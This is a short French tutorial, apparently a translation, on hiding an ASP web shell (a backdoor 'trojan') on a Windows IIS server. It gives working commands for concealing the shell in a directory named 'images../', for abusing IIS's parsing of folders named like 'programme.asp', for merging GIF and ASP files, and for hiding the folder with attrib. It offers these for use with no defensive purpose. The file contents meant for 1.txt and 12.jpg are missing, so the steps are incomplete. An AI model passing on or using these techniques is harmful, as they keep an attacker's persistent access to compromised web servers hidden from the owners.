Les deux méthodes suivantes peuvent masquer votre cheval de Troie asp, vous pouvez le tester 1. Créez un répertoire non standard : mkdir images../
Copiez le cheval de Troie ASP dans le répertoire : copiez c:/inetpub/wwwroot/dbm6.asp c:/inetpub/wwwroot/images../news.asp
Accédez au cheval de Troie ASP via le Web : http://ip/images../news.asp?action=login
Comment supprimer des répertoires non standards : rmdir images../ /s
2. IIS sous Windows analysera les fichiers du répertoire se terminant par .asp pour atteindre l'objectif de masquer la porte dérobée de notre propre page Web :
mkdir programme.asp
Créez un nouveau fichier 1.txt avec le contenu suivant :
Créez un nouveau contenu de fichier 12.jpg : ou utilisez le fichier fusionné avec GIF et ASP
attrib +H +S programme.asp
Accédez au cheval de Troie ASP en une phrase via le Web : http://ip/images/programme.asp/1.txt